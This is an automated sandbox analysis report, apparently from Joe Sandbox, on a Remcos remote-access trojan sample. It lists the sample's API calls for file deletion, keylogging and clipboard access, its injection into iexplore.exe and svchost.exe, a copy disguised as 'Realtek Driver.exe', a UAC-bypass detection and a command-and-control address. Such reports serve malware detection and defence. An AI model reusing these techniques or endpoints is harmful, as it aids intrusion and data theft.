                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03037538 _wcslen,CoGetObject,4_2_03037538
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_00407538 _wcslen,CoGetObject,5_2_00407538
                            Source: 1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_0040928E
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_0041C322
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_0040C388
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_004096A0
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,0_2_00408847
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00407877 FindFirstFileW,FindNextFileW,0_2_00407877
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0044E8F9 FindFirstFileExA,0_2_0044E8F9
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040BB6B
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_00419B86
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040BD72
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02D7928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_02D7928E
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02D7C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,3_2_02D7C388
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02D8C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,3_2_02D8C322
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02D796A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_02D796A0
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02D89B86 FindFirstFileW,FindNextFileW,FindNextFileW,3_2_02D89B86
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02D7BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,3_2_02D7BB6B
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02DBE8F9 FindFirstFileExA,3_2_02DBE8F9
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02D78847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,3_2_02D78847
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02D77877 FindFirstFileW,FindNextFileW,3_2_02D77877
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02D7BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,3_2_02D7BD72
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0304C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,4_2_0304C322
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,4_2_0303C388
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_0303928E
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030396A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_030396A0
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,4_2_0303BB6B
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03049B86 FindFirstFileW,FindNextFileW,FindNextFileW,4_2_03049B86
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03038847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,4_2_03038847
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03037877 FindFirstFileW,FindNextFileW,4_2_03037877
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0307E8F9 FindFirstFileExA,4_2_0307E8F9
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,4_2_0303BD72
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_0040928E
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,5_2_0041C322
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,5_2_0040C388
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_004096A0
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,5_2_00408847
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_00407877 FindFirstFileW,FindNextFileW,5_2_00407877
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_0044E8F9 FindFirstFileExA,5_2_0044E8F9
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,5_2_0040BB6B
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,5_2_00419B86
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,5_2_0040BD72
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_00407CD2
                            Source: C:\Users\user\Desktop\1.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\user\Desktop\1.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                            Source: C:\Users\user\Desktop\1.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                            Source: C:\Users\user\Desktop\1.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\user\Desktop\1.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\1.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Windows\SysWOW64\svchost.exe

                            Networking

                            barindex
                            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49704 -> 46.175.167.116:2404
                            Source: Malware configuration extractorIPs: 46.175.167.116
                            Source: global trafficTCP traffic: 192.168.2.5:49704 -> 46.175.167.116:2404
                            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                            Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                            Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49705 -> 178.237.33.50:80
                            Source: unknownTCP traffic detected without corresponding DNS query: 46.175.167.116
                            Source: unknownTCP traffic detected without corresponding DNS query: 46.175.167.116
                            Source: unknownTCP traffic detected without corresponding DNS query: 46.175.167.116
                            Source: unknownTCP traffic detected without corresponding DNS query: 46.175.167.116
                            Source: unknownTCP traffic detected without corresponding DNS query: 46.175.167.116
                            Source: unknownTCP traffic detected without corresponding DNS query: 46.175.167.116
                            Source: unknownTCP traffic detected without corresponding DNS query: 46.175.167.116
                            Source: unknownTCP traffic detected without corresponding DNS query: 46.175.167.116
                            Source: unknownTCP traffic detected without corresponding DNS query: 46.175.167.116
                            Source: unknownTCP traffic detected without corresponding DNS query: 46.175.167.116
                            Source: unknownTCP traffic detected without corresponding DNS query: 46.175.167.116
                            Source: unknownTCP traffic detected without corresponding DNS query: 46.175.167.116
                            Source: unknownTCP traffic detected without corresponding DNS query: 46.175.167.116
                            Source: unknownTCP traffic detected without corresponding DNS query: 46.175.167.116
                            Source: unknownTCP traffic detected without corresponding DNS query: 46.175.167.116
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_0041B411
                            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                            Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                            Source: iexplore.exe, 00000003.00000003.2048131908.000000000318E000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000003.00000003.2048445024.000000000319F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
                            Source: iexplore.exe, 00000003.00000003.2048131908.000000000316F000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000003.00000002.3265831941.00000000030BB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, Realtek Driver.exeString found in binary or memory: http://geoplugin.net/json.gp
                            Source: 1.exe, Realtek Driver.exe.0.drString found in binary or memory: http://geoplugin.net/json.gp/C
                            Source: iexplore.exe, 00000003.00000003.2048131908.000000000316F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpI
                            Source: iexplore.exe, 00000003.00000002.3265831941.00000000030BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
                            Source: iexplore.exe, 00000003.00000003.2048131908.000000000316F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpj
                            Source: iexplore.exe, 00000003.00000002.3265896381.000000000316F000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000003.00000003.2048131908.000000000316F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
                            Source: iexplore.exe, 00000003.00000002.3265896381.000000000316F000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000003.00000003.2048131908.000000000316F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpm

                            Key, Mouse, Clipboard, Microphone and Screen Capturing

                            barindex
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,000000000_2_0040A2F3
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,0_2_0040B749
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004168FC
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02D868FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_02D868FC
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030468FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,4_2_030468FC
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_004168FC
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,0_2_0040B749
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,0_2_0040A41B
                            Source: Yara matchFile source: 1.exe, type: SAMPLE
                            Source: Yara matchFile source: 3.2.iexplore.exe.4ba0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.Realtek Driver.exe.5e0620.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.svchost.exe.3030000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.iexplore.exe.4ba0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.iexplore.exe.2d70000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.iexplore.exe.30e0ba0.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.0.1.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.1.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.Realtek Driver.exe.5e0620.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.iexplore.exe.30e0ba0.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.svchost.exe.3030000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.Realtek Driver.exe.2570000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.Realtek Driver.exe.2570000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.iexplore.exe.2d70000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000008.00000000.2277687152.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.2024293538.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000000.2195185970.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.2016191129.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.2114459695.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.2278067341.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000000.2021874573.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.3265970543.0000000004BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2196423426.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000000.2113169256.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.3265805853.0000000003431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.2016636458.0000000000521000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.3265606404.0000000003030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.2024405798.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.2024631723.0000000002570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.3265831941.00000000030BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: 1.exe PID: 4956, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Realtek Driver.exe PID: 6508, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: iexplore.exe PID: 3716, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3448, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Realtek Driver.exe PID: 1352, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Realtek Driver.exe PID: 4996, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Realtek Driver.exe PID: 6552, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe, type: DROPPED

                            E-Banking Fraud

                            barindex
                            Source: Yara matchFile source: 1.exe, type: SAMPLE
                            Source: Yara matchFile source: 3.2.iexplore.exe.4ba0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.Realtek Driver.exe.5e0620.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.svchost.exe.3030000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.iexplore.exe.4ba0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.iexplore.exe.2d70000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.iexplore.exe.30e0ba0.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.0.1.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.1.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.Realtek Driver.exe.5e0620.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.iexplore.exe.30e0ba0.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.svchost.exe.3030000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.Realtek Driver.exe.2570000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.Realtek Driver.exe.2570000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.iexplore.exe.2d70000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000008.00000000.2277687152.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.2024293538.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000000.2195185970.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2196581789.0000000000697000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.2114588212.000000000055A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.2016191129.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.2114459695.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.2278067341.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.2278167412.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000000.2021874573.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.3265970543.0000000004BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2196423426.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000000.2113169256.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.3265805853.0000000003431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.2016636458.0000000000521000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.3265768781.0000000003400000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2022398909.00000000004FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.3265606404.0000000003030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.2024405798.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.2024631723.0000000002570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.3265831941.00000000030BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: 1.exe PID: 4956, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Realtek Driver.exe PID: 6508, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: iexplore.exe PID: 3716, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3448, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Realtek Driver.exe PID: 1352, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Realtek Driver.exe PID: 4996, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Realtek Driver.exe PID: 6552, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe, type: DROPPED

                            Spam, unwanted Advertisements and Ransom Demands

                            barindex
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0041CA73 SystemParametersInfoW,0_2_0041CA73
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02D8CA73 SystemParametersInfoW,3_2_02D8CA73
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0304CA73 SystemParametersInfoW,4_2_0304CA73
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_0041CA73 SystemParametersInfoW,5_2_0041CA73

                            System Summary

                            barindex
                            Source: 1.exe, type: SAMPLEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 1.exe, type: SAMPLEMatched rule: REMCOS_RAT_variants Author: unknown
                            Source: 1.exe, type: SAMPLEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 3.2.iexplore.exe.4ba0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 3.2.iexplore.exe.4ba0000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                            Source: 3.2.iexplore.exe.4ba0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 2.2.Realtek Driver.exe.5e0620.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 2.2.Realtek Driver.exe.5e0620.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                            Source: 2.2.Realtek Driver.exe.5e0620.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 8.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 8.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                            Source: 8.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 4.2.svchost.exe.3030000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 4.2.svchost.exe.3030000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                            Source: 4.2.svchost.exe.3030000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 3.2.iexplore.exe.4ba0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 3.2.iexplore.exe.4ba0000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                            Source: 3.2.iexplore.exe.4ba0000.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 3.2.iexplore.exe.2d70000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 3.2.iexplore.exe.2d70000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                            Source: 3.2.iexplore.exe.2d70000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
